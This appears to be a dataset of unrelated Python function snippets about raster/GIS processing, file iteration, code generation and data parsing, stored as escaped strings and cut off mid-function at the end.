header = \"\"\" <VRTRasterBand dataType=\"Byte\" band=\"1\" subClass=\"VRTDerivedRasterBand\">\"\"\"\n contents = \"\"\"\n <PixelFunctionType>{0}</PixelFunctionType>\n <PixelFunctionLanguage>Python</PixelFunctionLanguage>\n <PixelFunctionCode><![CDATA[{1}]]>\n </PixelFunctionCode>\"\"\"\n\n lines = open(filename, 'r').readlines()\n lines[3] = header # FIX ME: 3 is a hand constant\n lines.insert(4, contents.format(resample_name,\n get_resample(resample_name)))\n open(filename, 'w').write(\"\".join(lines))", "def HandleFiles(variables):\n\n # The template file is the html file into which we will write the\n # data from the stats file, formatted correctly for the gviz_api.\n template_file = open(variables[1], \"r\")\n page_template = template_file.read()\n template_file.close()\n\n # This is the path match pattern for finding stats files amongst\n # all the other files it could be. eg: *.stt\n file_pattern = variables[2]\n\n # This is the directory with files that we will use to do the comparison\n # against.\n baseline_dir = variables[3]\n snrs = ''\n filestable = {}\n filestable['dsnr'] = ''\n filestable['drate'] = ''\n filestable['avg'] = ''\n\n # Go through each metric in the list.\n for column in range(1,2):\n\n # Dirs is directories after the baseline to compare to the base.\n dirs = variables[4:len(variables)]\n\n # Find the metric files in the baseline directory.\n dir_list = sorted(fnmatch.filter(os.listdir(baseline_dir), file_pattern))\n\n for metric in ['avg','dsnr','drate']:\n description = {\"file\": (\"string\", \"File\")}\n\n # Go through each directory and add a column header to our description.\n countoverall = {}\n sumoverall = {}\n\n for directory in dirs:\n description[directory] = (\"number\", directory)\n countoverall[directory] = 0\n sumoverall[directory] = 0\n\n # Data holds the data for the visualization, name given comes from\n # gviz_api sample code.\n data = []\n for filename in dir_list:\n row = {'file': splitext(basename(filename))[0] }\n baseline_file_name = baseline_dir + \"/\" + filename\n\n # Read the metric file from each of the directories in our list.\n for directory in dirs:\n metric_file_name = directory + \"/\" + filename\n\n # If there is a metric file in the current directory, open it\n # and calculate its overall difference between it and the baseline\n # directory's metric file.\n if os.path.isfile(metric_file_name):\n overall = FileBetter(baseline_file_name, metric_file_name,\n column, metric)\n row[directory] = overall\n\n sumoverall[directory] += overall\n countoverall[directory] += 1\n\n data.append(row)\n\n # Add the overall numbers.\n row = {\"file\": \"OVERALL\" }\n if countoverall[directory]:\n for directory in dirs:\n row[directory] = sumoverall[directory] / countoverall[directory]\n data.append(row)\n\n # write the tables out\n data_table = gviz_api.DataTable(description)\n data_table.LoadData(data)\n\n filestable[metric] = ( filestable[metric] + \"filestable_\" + metric +\n \"[\" + str(column) + \"]=\" + data_table.ToJSon()\n + \"\\n\" )\n\n filestable_avg = filestable['avg']\n filestable_dpsnr = filestable['dsnr']\n filestable_drate = filestable['drate']\n\n # Now we collect all the data for all the graphs. First the column\n # headers which will be Datarate and then each directory.\n columns = (\"datarate\",baseline_dir)\n description = {\"datarate\":(\"number\", \"Datarate\")}\n for directory in dirs:\n description[directory] = (\"number\", directory)\n\n description[baseline_dir] = (\"number\", baseline_dir)\n\n snrs = snrs + \"snrs[\" + str(column) + \"] = [\"\n\n # Now collect the data for the graphs, file by file.\n for filename in dir_list:\n\n data = []\n\n # Collect the file in each directory and store all of its metrics\n # in the associated gviz metrics table.\n all_dirs = dirs + [baseline_dir]\n for directory in all_dirs:\n\n metric_file_name = directory + \"/\" + filename\n if not os.path.isfile(metric_file_name):\n continue\n\n # Read and parse the metrics file storing it to the data we'll\n # use for the gviz_api.Datatable.\n metrics = ParseMetricFile(metric_file_name, column)\n for bitrate, metric in metrics:\n data.append({\"datarate\": bitrate, directory: metric})\n\n data_table = gviz_api.DataTable(description)\n data_table.LoadData(data)\n snrs = snrs + \"'\" + data_table.ToJSon(\n columns_order=tuple([\"datarate\",baseline_dir]+dirs)) + \"',\"\n\n snrs = snrs + \"]\\n\"\n\n formatters = \"\"\n for i in range(len(dirs)):\n formatters = \"%s formatter.format(better, %d);\" % (formatters, i+1)\n\n print FillForm(page_template, vars())\n return", "def run(fn, *input_values, **kwds):\n \n ee = kwds.get('ee', shared_exec_engine)\n input_types = [arg.type for arg in fn.args]\n gv_inputs = [gv_from_python(x, t) \n for (x,t) in \n zip(input_values, input_types)]\n \n return run_with_generic_values(fn, gv_inputs, ee)", "def parsedFile(self, *args, **kwargs):\n\t\tif not self._parsed:\n\t\t\tself.parse()\n\n\t\treturn function(self, *args, **kwargs)", "def filter_f(fns, ltaper, lowerp, upperp, utaper, eqband, eqltaper, equtaper, npow, bindir):\n # filtercmd = bindir+\"/filter4\"\n filtercmd = bindir + \"/filter4 1>/dev/null\"\n for src, tar, eqtar in fns:\n p = sp.Popen(filtercmd, shell=True, bufsize=0, stdin=sp.PIPE, stdout=None)\n child = p.stdin\n print >> child, ltaper, lowerp, upperp, utaper, npow, src, tar + '_tmp'\n err = child.close()\n ret = p.wait()\n if err or ret != 0:\n raise RuntimeError, '%r failed with exit code %d' % (filtercmd, err)\n p = sp.Popen(filtercmd, shell=True, bufsize=0, stdin=sp.PIPE, stdout=None)\n child = p.stdin\n print >> child, eqltaper, eqband[0], eqband[1], equtaper, npow, tar + '_tmp', eqtar + '_tmp'\n err = child.close()\n ret = p.wait()\n if err or ret != 0:\n raise RuntimeError, '%r failed with exit code %d' % (filtercmd, err)\n return 1", "def io_files(self, iterable, ext=None, func=None):\n for input_path in iterable:\n output_path, temp_file = self.check_output_path(input_path, ext)\n\n try:\n func(input_path, temp_file)\n except Exception as e:\n if self._force_continue is True:\n self.handle_error(e, input_path)\n else:\n raise e\n\n self.overwrite_output_path(input_path, output_path, temp_file)", "def normalize_to_std_grid(self, inputs, resamplemethod = 'nearest'):\n outputs = []\n npy_outputs = []\n if resamplemethod == 'nearest':\n rs = Resampling.nearest\n else:\n print('only nearest neighbor resampling is supported at this time')\n sys.exit(0)\n\n for i, warpfile in enumerate(inputs):\n print('warpfile', warpfile)\n with rasterio.open(warpfile) as src:\n # create the virtual raster based on the standard rasterio attributes from the sample tiff and shapefile feature.\n with WarpedVRT(src, resampling=rs,\n crs=self.crs,\n transform=self.transform,\n height=self.rows,\n width=self.cols) as vrt:\n data = vrt.read()\n print(type(vrt))\n # save the file as an enumerated tiff. reopen outside this loop with the outputs list\n outwarp = os.path.join(self.temp_folder, 'temp_{}.tif'.format(i))\n rio_shutil.copy(vrt, outwarp, driver='GTiff')\n outputs.append(outwarp)\n\n # output each virtual file as a temporary .tif file in a temp folder somewhere in the outputs directory.\n # for each file in the temp directory read in the raster as a numpy array and return the list of numpy arrays\n # from this method for us in the rest of the code.\n for ow in outputs:\n with rasterio.open(ow, 'r') as src:\n arr = src.read(1)\n npy_outputs.append(arr)\n\n return npy_outputs", "def render_functions(r2, covered_bbs, output_dir):\n for func_addr in function_addrs(r2):\n # Get the function name\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n # XXX This is very hacky - need something more robust\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n # Node name is not a hex string\n continue\n\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name, func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)", "def file_func(self,):\n return self._file_func", "def process_data(db_cursor, filepath, func):\n\n # Get all files matching extension from directory\n all_files = []\n for root, _, files in os.walk(filepath):\n files = glob.glob(os.path.join(root, '*.json'))\n for f in files:\n all_files.append(os.path.abspath(f))\n\n num_files = len(all_files)\n print(f'{num_files} files found in {filepath}')\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(db_cursor, datafile)\n print(f'{i}/{num_files} files processed.')", "def gen_code(self, filename, func_name):\n\n assert self.bits is not None\n\n vd_list = []\n n_vars = 0\n for tree in self.trees:\n vd_list.append(tree.gen_code(n_vars))\n n_vars += len(vd_list[-1])\n\n # checks the type by the suffix\n\n is_v = filename.split(\".\")[-1] == \"v\"\n\n assert self.inputs\n\n f = open(filename, \"w\")\n\n i_bits = np.sum(self.bits[:-1])\n o_bits = self.bits[-1]\n o_sign = self.is_neg[-1]\n\n if is_v:\n f.write(\"module {}(input [{}:0] i, output [{}:0] o);\\n\".format(\n func_name, i_bits-1, o_bits-1))\n else:\n f.write(\"#include<ac_int.h>\\n\\n\")\n f.write(\"void {}(ac_int<{},false> i, ac_int<{},{}> &o)\\n\".format(\n func_name, i_bits, o_bits, o_sign))\n f.write(\"{\\n\")\n\n\n # write function headline\n s_in_line = []\n\n i_bits = self.bits[0]\n i_sign = self.is_neg[0]\n\n if is_v:\n i_datatype = \" wire {}[{}:0] \".format(\n \"signed \" if i_sign else \"\", i_bits-1)\n else:\n i_datatype = \" ac_int<{},{}> \".format(i_bits, i_sign)\n\n len_s = len(i_datatype)\n\n for i in range(self.inputs):\n if is_v:\n s = (\n \"i_\" + str(i) + \" = \" + \"i[\" + str(i_bits*(i+1)-1) + \":\" +\n str(i_bits*i) + \"]\"\n )\n else:\n s = (\n \"i_\" + str(i) + \" = \" + \"i.slc<\" + str(i_bits) + \">(\" +\n str(i_bits*i) + \")\"\n )\n if (\n len_s + len(s) + 2 > 70 or i_bits != self.bits[i] or\n i_sign != self.is_neg[i]\n ):\n f.write(i_datatype + \", \".join(s_in_line) + \";\\n\")\n\n s_in_line = []\n if is_v:\n i_datatype = \" wire {}[{}:0] \".format(\n \"signed \" if i_sign else \"\", i_bits-1)\n else:\n i_datatype = \" ac_int<{},{}> \".format(i_bits, i_sign)\n\n len_s = len(i_datatype)\n\n s_in_line.append(s)\n len_s += len(s) + 2\n\n if s_in_line:\n f.write(i_datatype + \", \".join(s_in_line) + \";\\n\")\n\n if is_v:\n o_datatype = \" wire {}[{}:0] \".format(\n \"signed \" if o_sign else \"\", o_bits)\n else:\n o_datatype = \" ac_int<{},{}> \".format(o_bits, o_sign)\n\n o_list = []\n for i in range(len(vd_list)):\n for v in vd_list[i]:\n if is_v:\n f.write(o_datatype + v + \" = \" + vd_list[i][v] + \";\\n\")\n else:\n f.write(o_datatype + v + \" = \" + vd_list[i][v] + \";\\n\")\n f.write(\"\\n\")\n o_list.append(v)\n\n assert len(o_list) <= 3\n\n if is_v:\n f.write(\" assign \")\n else:\n f.write(\" \")\n\n if len(o_list) == 1:\n f.write(\"o = \" + o_list[0] + \";\")\n elif len(o_list) == 2:\n cond = \"( \" + o_list[0] + \" == \" + o_list[1] + \" ) \"\n n1 = o_list[0]\n n0 = \"( ( \" + \" + \".join(o_list) + \" ) >> 1 )\"\n f.write(\"o = \" + cond + \"? \" + n1 + \": \" + n0)\n elif len(o_list) == 3:\n cond = (\n \"( \" +\n \"( \" + \" == \".join(o_list[0:2]) + \" )?\" + o_list[0] + \":\" +\n \"( \" + \" == \".join(o_list[1:]) + \" )?\" + o_list[1] + \":\" +\n \"( \" + \" == \".join([o_list[0], o_list[2]]) + \" )?\" + o_list[0] +\n \":\" + \"( \" + \" < \".join(o_list[0:2]) + \" ) ?\" +\n \"( ( \" + \" < \".join(o_list[1:]) + \" ) ?\" + o_list[1] + \":\" +\n o_list[2] + \" ) : \" +\n \"( ( \" + \" < \".join([o_list[0], o_list[2]]) + \" ) ?\" + o_list[0] +\n \":\" + o_list[2] + \" )\"\n )\n f.write(\"o = \" + cond + \";\\n\")\n if is_v:\n f.write(\"endmodule\")\n else:\n f.write(\"}\")\n\n f.close()", "def convert(threshold, infile, tmpfile_1, tmpfile_2, outfile):\n args = [\n \"gdal_calc.py\",\n '-A', infile,\n '--outfile={}'.format(tmpfile_1),\n '--calc=logical_and(A>={}, A<999)'.format(threshold),\n '--type=Byte', '--NoDataValue=0',\n '--co=SPARSE_OK=YES',\n '--co=NBITS=1',\n '--quiet'\n # Could enable compression\n # --co=\"COMPRESS=LZW\"\n ]\n subprocess.run(args)\n\n subprocess.run([\n \"gdal_polygonize.py\",\n tmpfile_1,\n '-q',\n '-f', 'ESRI Shapefile',\n tmpfile_2\n ])\n\n subprocess.run([\n \"ogr2ogr\",\n '-a_srs', 'EPSG:4326',\n outfile,\n tmpfile_2\n ])\n\n subprocess.run([\"rm\", tmpfile_1])\n subprocess.run([\"rm\", tmpfile_2])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'shx')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'dbf')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'prj')])", "def normalize_to_std_grid(self, inputs, resamplemethod = 'nearest'):\n outputs = []\n npy_outputs = []\n if resamplemethod == 'nearest':\n rs = Resampling.nearest\n else:\n print('only nearest neighbor resampling is supported at this time')\n sys.exit(0)\n\n for i, warpfile in enumerate(inputs):\n # print('warpfile', warpfile)\n with rasterio.open(warpfile) as src:\n # TODO - make the default configurable.\n# if src.crs == None:\n# src.crs = CRS.from_epsg(4326)\n # create the virtual raster based on the standard rasterio attributes from the sample tiff and shapefile feature.\n with WarpedVRT(src, resampling=rs,\n crs=self.crs,\n transform=self.transform,\n height=self.rows,\n width=self.cols) as vrt:\n data = vrt.read()\n # print(type(vrt))\n # save the file as an enumerated tiff. reopen outside this loop with the outputs list\n outwarp = os.path.join(self.temp_folder, 'temp_{}.tif'.format(i))\n rio_shutil.copy(vrt, outwarp, driver='GTiff')\n outputs.append(outwarp)\n\n # output each virtual file as a temporary .tif file in a temp folder somewhere in the outputs directory.\n # for each file in the temp directory read in the raster as a numpy array and return the list of numpy arrays\n # from this method for us in the rest of the code.\n for ow in outputs:\n with rasterio.open(ow, 'r') as src:\n arr = src.read(1)\n npy_outputs.append(arr)\n\n return npy_outputs", "def process_data(cursor, connection, filepath, function):\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root, '*.json'))\n for f in files:\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n function(cursor, datafile)\n connection.commit()\n print('{}/{} files processed.'.format(i, num_files))", "def postprocess_cga(lines, outfile):\n pattern = re.compile(\"^\\s*([0-9,]+)\\s+\\([ 0-9.]+%\\)\\s+Source/(\\S+):(\\S+)\\(.*\\).*$\")\n\n totalCost = 0.0\n functionTable = []\n functionMap = {}\n\n for line in lines:\n line = line.strip()\n match = pattern.match(line)\n if not match:\n continue\n\n cost = float(match.group(1).replace(\",\", \"\"))\n sourceFile = match.group(2)\n function = match.group(3)\n\n # Filter out library code we don't want to change\n if function.startswith(\"stbi__\"):\n continue\n\n totalCost += cost\n\n # Accumulate the scores from functions in multiple call chains\n if function in functionMap:\n index = functionMap[function]\n functionTable[index][1] += cost\n functionTable[index][2] += cost\n # Else add new functions to the end of the table\n else:\n functionMap[function] = len(functionTable)\n functionTable.append([function, cost, cost])\n\n # Sort the table by accumulated cost\n functionTable.sort(key=lambda x: 101.0 - x[2])\n\n for function in functionTable:\n function[2] /= totalCost\n function[2] *= 100.0\n\n with open(outfile, \"w\") as fileHandle:\n\n totals = 0.0\n for function in functionTable:\n # Omit entries less than 1% load\n if function[2] < 1:\n break\n\n totals += function[2]\n fileHandle.write(\"%5.2f%% %s\\n\" % (function[2], function[0]))\n\n fileHandle.write(\"======\\n\")\n fileHandle.write(f\"{totals:5.2f}%\\n\")", "def run(self, verbose=False):\n from utils import write_to_file # function to write json to file\n self.read_json()\n graph = self.parse_jsons()\n json = self.pipe_vl2vg(graph)\n return self.write_to_file(rawinput=json, filetype='json', output_path=self.output_path, engine_name=self.engine_name, algorithm_name=self.algorithm_name, suffix=self.file_suffix, verbose=verbose)", "def CallF_DirFile(dir_path,function,file_filter_=None,regular=False,**kw):\n file_list = Get_dir_file_list(dir_path=dir_path,file_filter_=file_filter_,regular=regular,distinguish=True)\n file_list = file_list[0]\n save_list = []\n for file_name in file_list:\n file_path = os.path.join(dir_path,file_name)\n save_list.append(function(file_path=file_path,**kw))\n return save_list", "def py_SurfStatAvSurf(filenames, fun = np.add, output_surfstat=False):\n \n if filenames.ndim is not 2:\n raise ValueError('Filenames must be a 2-dimensional array.')\n \n for i in range(0, filenames.shape[0]):\n surfaces = np.empty(filenames.shape[1], dtype=np.object)\n for j in range(0, filenames.shape[1]):\n \n # Check whether input is BSPolyData or a filename. \n if isinstance(filenames[i,j], BSPolyData):\n surfaces[j] = filenames[i,j] \n else:\n surfaces[j] = read_surface(filenames[i,j])\n \n # Concatenate second dimension of filenames. \n if j is 0:\n tri = get_cells(surfaces[j]) \n coord = get_points(surfaces[j])\n else:\n tri = np.concatenate((tri, get_cells(surfaces[j]) + coord.shape[0]), axis=0)\n coord = np.concatenate((coord, get_points(surfaces[j])), axis=0)\n \n if i is 0:\n m = 1\n coord_all = coord\n else:\n coord_all = fun(coord_all,coord)\n m = fun(m,1)\n \n coord_all = coord_all / m \n \n if output_surfstat:\n surface = {'tri': np.array(tri) + 1, 'coord': np.array(coord_all).T}\n else:\n surface = build_polydata(coord_all, tri)\n \n return surface", "def vjp_assemble_eval(\n fenics_function: Callable, fenics_templates: FenicsVariable, *args: np.array\n) -> Tuple[np.array, Callable]:\n\n numpy_output, ufl_form, fenics_inputs = assemble_eval(\n fenics_function, fenics_templates, *args\n )\n\n def vjp_fun(g):\n return tuple(\n vjp if vjp is not None else jax.ad_util.zeros_like_jaxval(args[i])\n for i, vjp in enumerate(vjp_assemble_impl(g, ufl_form, fenics_inputs))\n )\n\n return numpy_output, vjp_fun", "def InterpolateFunctions(self, , p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=...):\n ...", "def process(self,fileobj_out,fileobj_in):\n pass", "def run_functions( functions, dir ):\n res = []\n for i in range(0, len(functions)):\n res.append(functions[i].execute(dir))\n return summarize_as_html(res)", "def bind(self, func: Callable[[Any], IO]) -> IO:\n\n filename, g = self._value\n return ReadFile(filename, lambda s: g(s).bind(func))", "def read_func(filename=def_func_name, index=def_index):\n file = open(filename+str(index)+\".txt\", \"r\")\n functions = []\n for i in range(3):\n line = file.readline()\n line = line.replace('\\'', '').strip()\n functions.append(parse_line(line))\n return functions", "def transform(infile, output, insrs, format_name):\n\n logging.info('Transforming %s from %s to %s' % (infile, insrs, output)) \n in_srs = osr.SpatialReference()\n in_srs.ImportFromEPSG(insrs)\n out_srs = osr.SpatialReference()\n out_srs.ImportFromEPSG(4324)\n coordTrans = osr.CoordinateTransformation(in_srs, out_srs)\n\n in_dsn = ogr.Open(infile)\n in_layer = in_dsn.GetLayer()\n in_feature_definition = in_layer.GetLayerDefn()\n\n out_driver = ogr.GetDriverByName(format_name)\n out_dsn = out_driver.CreateDataSource(output)\n out_layer = out_dsn.CreateLayer(in_layer.GetName(),\n geom_type=in_layer.GetGeomType())\n\n # add fields\n for i in range(0, in_feature_definition.GetFieldCount()):\n fieldDefn = in_feature_definition.GetFieldDefn(i)\n out_layer.CreateField(fieldDefn)\n\n # get the output layer's feature definition\n out_feature_definition = out_layer.GetLayerDefn()\n\n # loop through the input features\n inFeature = in_layer.GetNextFeature()\n while inFeature:\n # get the input geometry\n geom = inFeature.GetGeometryRef().Clone()\n # reproject the geometry\n geom.Transform(coordTrans)\n # create a new feature\n outFeature = ogr.Feature(out_feature_definition)\n # set the geometry and attribute\n outFeature.SetGeometry(geom)\n for i in range(0, out_feature_definition.GetFieldCount()):\n outFeature.SetField(out_feature_definition.GetFieldDefn(i).GetNameRef(), inFeature.GetField(i))\n # add the feature to the shapefile\n out_layer.CreateFeature(outFeature)\n # destroy the features and get the next input feature\n outFeature.Destroy()\n inFeature.Destroy()\n inFeature = in_layer.GetNextFeature()\n\n # close the shapefiles\n in_dsn.Destroy()\n out_dsn.Destroy()", "def Map(context, funcname, *nodesets):\n (prefix, local) = ExpandQName(funcname, namespaces=context.processorNss)\n func = (g_extFunctions.get(expanded) or\n CoreFunctions.CoreFunctions.get(expanded, None))\n if not func:\n raise Exception('Dynamically invoked function %s not found.'%funcname)\n flist = [f]*len(nodesets)\n lf = lambda x, f, *args: apply(f, args)\n retlist = apply(map, (lf, flist) + nodesets)\n\n proc = context.processor\n result_nodeset = []\n for ret in retlist:\n proc.pushResult()\n proc.writers[-1].text(Conversions.StringValue(ret))\n frag = proc.popResult()\n context.rtfs.append(frag)\n result_nodeset.append(frag.childNodes[0])\n return result_nodeset", "def buildFunc(self, parFiles):\n imageMatrix = None\n affine = None\n TR = None\n\n ### Loop over all of the par files\n nVols = len(parFiles)\n for par_fname in parFiles:\n # build full path to this par file\n par_fname = join(self.seriesDir, par_fname)\n\n # make sure there is a corresponding .rec file\n if not os.path.isfile(par_fname.replace('.par', '.rec')):\n print('No REC file found to match par: {}', par_fname)\n\n ### Build the 3d voxel array for this volume and reorder to RAS+\n # nibabel will load the par/rec, but there can be multiple images\n # (mag, phase, etc...) concatenated into the 4th dimension. Loading\n # with the strict_sort option (I think) will make sure the first\n # image is the data we want. Extract this data, then reorder the\n # voxel array to RAS+\n thisVol = nib.load(par_fname, strict_sort=True)\n\n # get the vol index (0-based index) from the acq_nr field of the\n # header (1-based index)\n volIdx = int(thisVol.header.general_info['acq_nr']) - 1\n\n # set TR\n if TR is None:\n TR = thisVol.header.general_info['repetition_time'][0]\n\n # convert to RAS+\n thisVol_RAS = nib.as_closest_canonical(thisVol)\n\n # construct the imageMatrix if it hasn't been made yet\n if imageMatrix is None:\n imageMatrix = np.zeros(shape=(thisVol_RAS.shape[0],\n thisVol_RAS.shape[1],\n thisVol_RAS.shape[2],\n nVols), dtype=np.uint16)\n\n # construct the affine if it isn't made yet\n if affine is None:\n affine = thisVol_RAS.affine\n\n # Add this data to the image matrix\n imageMatrix[:, :, :, volIdx] = thisVol_RAS.get_fdata()[:, :, :, 0].astype('uint16')\n\n ### Build a Nifti object\n funcImage = nib.Nifti1Image(imageMatrix, affine=affine)\n\n # add the correct TR to the header\n pixDims = np.array(funcImage.header.get_zooms())\n pixDims[3] = TR\n funcImage.header.set_zooms(pixDims)\n\n return funcImage", "def map_func(h, configs, args):\n\tif args.verbose:\n\t\tcmd = \"python {} -i {}/threshold{}.tif -o {}/threshold{}.shp -v\".format(\n\t\t\tconfigs[\"path\"][\"polygons\"],\n\t\t\tconfigs[\"path\"][\"output\"],\n\t\t\th,\n\t\t\tconfigs[\"path\"][\"output\"],\n\t\t\th\n\t\t)\n\t\tprint cmd\n\telse:\n\t\tcmd = \"python {} -i {}/threshold{}.tif -o {}/threshold{}.shp\".format(\n\t\t\tconfigs[\"path\"][\"polygons\"],\n\t\t\tconfigs[\"path\"][\"output\"],\n\t\t\th,\n\t\t\tconfigs[\"path\"][\"output\"],\n\t\t\th\n\t\t)\n\tcmd_args = shlex.split(cmd)\n\tstdout,stderr = sp.Popen(\n\t\tcmd_args,\n\t\tstdin = sp.PIPE,\n\t\tstdout = sp.PIPE,\n\t\tstderr = sp.PIPE\n\t).communicate()\n\tif args.verbose:\n\t\tprint stdout, stderr\n\treturn True", "def main(path):\n vm_files = []\n if not os.path.exists(path):\n print(\"Error: File or directory does not exist: %s\"\n % path)\n return\n\n elif os.path.isdir(path): # Directory of files\n vm_files = filter_paths(path)\n dir_path = path\n file_name = os.path.basename(path) + FILE_EXTENSION_ASM\n if not vm_files: # no vm files found\n print(\"Error: No files matching %s found in supplied \"\n \"directory: %s\" % (FILE_EXTENSION_VM, path))\n return\n\n elif os.path.isfile(path): # Single file\n if not path.endswith(FILE_EXTENSION_VM):\n print(\"Error: Mismatched file type.\\n\\\"%s\\\"suffix is not a valid \"\n \"file type. Please supply .vm filename or dir.\" % path)\n return\n vm_files.append(path)\n dir_path = os.path.dirname(path)\n file_name = os.path.splitext(os.path.basename(path))[0] + \\\n FILE_EXTENSION_ASM\n\n else:\n print(\"Error: Unrecognized path: \\\"%s\\\"\\n\"\n \"Please supply dir or path/filename.vm\")\n return\n\n try:\n # Initilizes write based, using a condition for multiple file reading.\n # Multiple files have a special initlization\n writer = CodeWriter(os.path.join(dir_path, file_name),\n len(vm_files) > 1)\n for vm_file in vm_files:\n translate_file(vm_file, writer)\n writer.close()\n\n except OSError:\n print(\"Could not open some file.\\n \"\n \"If file exists, check spelling of file path.\")\n return\n\n except Exception as e:\n print(\"Some exception occurred while parsing.\", e)\n traceback.print_exc()\n return", "def addfunctions(dtls, bunchdt):\n snames = [\n \"BuildingSurface:Detailed\",\n \"Wall:Detailed\",\n \"RoofCeiling:Detailed\",\n \"Floor:Detailed\",\n \"FenestrationSurface:Detailed\",\n \"Shading:Site:Detailed\",\n \"Shading:Building:Detailed\",\n \"Shading:Zone:Detailed\",\n ]\n for sname in snames:\n if sname.upper() in bunchdt:\n surfaces = bunchdt[sname.upper()]\n for surface in surfaces:\n func_dict = {\n \"area\": fh.area,\n \"height\": fh.height, # not working correctly\n \"width\": fh.width, # not working correctly\n \"azimuth\": fh.azimuth,\n \"tilt\": fh.tilt,\n \"coords\": fh.getcoords, # needed for debugging\n }\n try:\n surface.__functions.update(func_dict)\n except KeyError as e:\n surface.__functions = func_dict\n # add common functions\n # for name in dtls:\n # for idfobject in bunchdt[name]:\n # idfobject.__functions\n # idfobject['__functions']['fieldnames'] = fieldnames\n # idfobject['__functions']['fieldvalues'] = fieldvalues\n # idfobject['__functions']['getrange'] = GetRange(idfobject)\n # idfobject['__functions']['checkrange'] = CheckRange(idfobject)", "def main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', help='Input .py file', nargs='+')\n args = parser.parse_args()\n\n mod_func = []\n\n for pyfile in args.input:\n tree = ast.parse(open(pyfile).read())\n\n methods = sorted({node.name for node in ast.walk(tree)\n if isinstance(node, ast.FunctionDef)})\n mod_func.extend([[pyfile, methods[i]] for i in range(len(methods))])\n\n write_csv(\"meth_func.csv\", mod_func)", "def transform(self, *fs):\n return transform(self, *fs)", "def get_vulnerability_functions_04(fname):\n categories = dict(assetCategory=set(), lossCategory=set(),\n vulnerabilitySetID=set())\n imts = set()\n taxonomies = set()\n vf_dict = {} # imt, taxonomy -> vulnerability function\n for vset in nrml.read(fname).vulnerabilityModel:\n categories['assetCategory'].add(vset['assetCategory'])\n categories['lossCategory'].add(vset['lossCategory'])\n categories['vulnerabilitySetID'].add(vset['vulnerabilitySetID'])\n IML = vset.IML\n imt_str = IML['IMT']\n imls = ~IML\n imts.add(imt_str)\n for vfun in vset.getnodes('discreteVulnerability'):\n taxonomy = vfun['vulnerabilityFunctionID']\n if taxonomy in taxonomies:\n raise InvalidFile(\n 'Duplicated vulnerabilityFunctionID: %s: %s, line %d' %\n (taxonomy, fname, vfun.lineno))\n taxonomies.add(taxonomy)\n with context(fname, vfun):\n loss_ratios = ~vfun.lossRatio\n coefficients = ~vfun.coefficientsVariation\n if len(loss_ratios) != len(imls):\n raise InvalidFile(\n 'There are %d loss ratios, but %d imls: %s, line %d' %\n (len(loss_ratios), len(imls), fname,\n vfun.lossRatio.lineno))\n if len(coefficients) != len(imls):\n raise InvalidFile(\n 'There are %d coefficients, but %d imls: %s, line %d' %\n (len(coefficients), len(imls), fname,\n vfun.coefficientsVariation.lineno))\n with context(fname, vfun):\n vf_dict[imt_str, taxonomy] = scientific.VulnerabilityFunction(\n taxonomy, imt_str, imls, loss_ratios, coefficients,\n vfun['probabilisticDistribution'])\n categories['id'] = '_'.join(sorted(categories['vulnerabilitySetID']))\n del categories['vulnerabilitySetID']\n return vf_dict, categories", "def define_functions(self):\n\n self.define_vector_functions()\n self.define_scalar_functions()\n\n return None", "def vl2img(vl_json_in, fileformat):\n\n # TODO would prefer to do this properly with pipes\n # using | and shell=True is safe though given no arguments\n executables = {\"svg\": \"vg2svg\", \"png\": \"vg2png\", \"pdf\": \"vg2pdf\"}\n try:\n exe = executables[fileformat]\n except KeyError as e:\n print(e.output)\n try:\n return subprocess.check_output(\"vl2vg | %s\" % exe, shell=True, input=vl_json_in)\n except subprocess.CalledProcessError as e:\n print(e.output)", "def render_function(children):\r\n fname = children[0].latex\r\n if casify(fname) not in functions:\r\n pass # TODO turn unknown function red or give some kind of error\r\n\r\n # Wrap the input of the function with parens or braces.\r\n inner = children[1].latex\r\n if fname == \"sqrt\":\r\n inner = u\"{{{expr}}}\".format(expr=inner)\r\n else:\r\n if children[1].tall:\r\n inner = ur\"\\left({expr}\\right)\".format(expr=inner)\r\n else:\r\n inner = u\"({expr})\".format(expr=inner)\r\n\r\n # Correctly format the name of the function.\r\n if fname == \"sqrt\":\r\n fname = ur\"\\sqrt\"\r\n elif fname == \"log10\":\r\n fname = ur\"\\log_{10}\"\r\n elif fname == \"log2\":\r\n fname = ur\"\\log_2\"\r\n else:\r\n fname = ur\"\\text{{{fname}}}\".format(fname=fname)\r\n\r\n # Put it together.\r\n latex = fname + inner\r\n return LatexRendered(latex, tall=children[1].tall)", "def _zipper(self, func):\n if func not in self.resmap:\n return []\n return itertools.chain(*[f(self.blob.get(name, None), self.filepath, self.tree, self.conn, self.dbpath)\n for name, f in self.resmap[func]])", "def process(self, file_list, shapefiles_dir, output_dir):\n for datatype in self.data_types:\n for data_file in file_list:\n data_file = str(data_file)\n original_filename = os.path.basename(data_file)\n cut_fname = original_filename[:len(self.date_format)+2]\n observation_date = datetime.strptime(cut_fname, self.date_format).strftime('%Y%m%d')\n try:\n input_file = HE5(self.data_directory, original_filename)\n if ('nc4' in data_file):\n input_file = NC4(self.data_directory, original_filename)\n data = input_file.read(datatype.ds_name)\n except Exception as e:\n print(e)\n continue\n\n rasterdata = input_file.genTif(data, datatype.resolution)\n\n for shpfile in Path(shapefiles_dir).rglob('*.shp'):\n shapefile = 